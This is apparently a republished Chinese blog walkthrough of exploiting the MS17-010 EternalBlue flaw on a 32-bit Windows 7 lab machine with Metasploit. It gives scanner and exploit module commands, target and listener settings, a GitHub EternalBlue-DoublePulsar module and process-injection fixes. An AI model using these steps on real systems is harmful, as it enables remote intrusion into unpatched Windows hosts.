关于利用kali linux2017.2中MSFCONSOLE 利用MS17-010漏洞发起攻击的坑

1、直接使用msfconsole中自带的 “ms17_010_eternalblue”模块

    攻击机:192.168.148.134  kali linux2017.2  x64

    靶机:192.168.148.137     win7   x32


    1.1先用msfconsole的smb模块扫描,看看是否有漏洞

 use auxiliary/scanner/smb/smb_ms17_010
 auxiliary(smb_ms17_010) > set RHOSTS 192.168.148.137   若要范围扫描,则将IP改为 192.168.148.*

        存在漏洞!!

    

    1.2使用模块

use exploit/windows/smb/ms17_010_eternalblue 

    show options

    

    设置目标:

set rhost 192.168.148.137

    设置payload等

 set lhost 192.168.148.134

set lport 4444
run

       结果:


        这里提示我们 架构选择不对,我们再来看看target


        这个x64括号是指什么?

        不知道,难道是payload设置错了?

    

        这里用了show payloads,发现 这里可选择的payload都是64位的,我们的目标机是32位的,所以提示我们架构不对。

        这时候,这个msf自带的模块似乎不能用。


2、使用github上的模块

https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit/

    2.1复制到ROOT目录,解压

 2.2 将Github下载来的eternalblue_doublepulsar.rb,拷贝到 /usr/share/metasploit-framework/modules/exploits/windows/smb目录中。

 2.3打开msf,

   执行reload_all

   

 2.4调用模块

use exploit/windows/smb/eternalblue_doublepulsar

 2.5查看选项


 2.6设置


由于目标是win7 32 位,所以target选8(默认),然后run

 2.7run

         当执行exploit出现问题该如何解决?

         

          打开多架构支持/安装wine32。

    wine  -h

    2.8再次run

    

    又报错,这时候,我们修改注入进程

  set processinject explorer.exe

    run


注入成功

    

截屏



猜你喜欢

转载自blog.csdn.net/dieju8330/article/details/80013069
今日推荐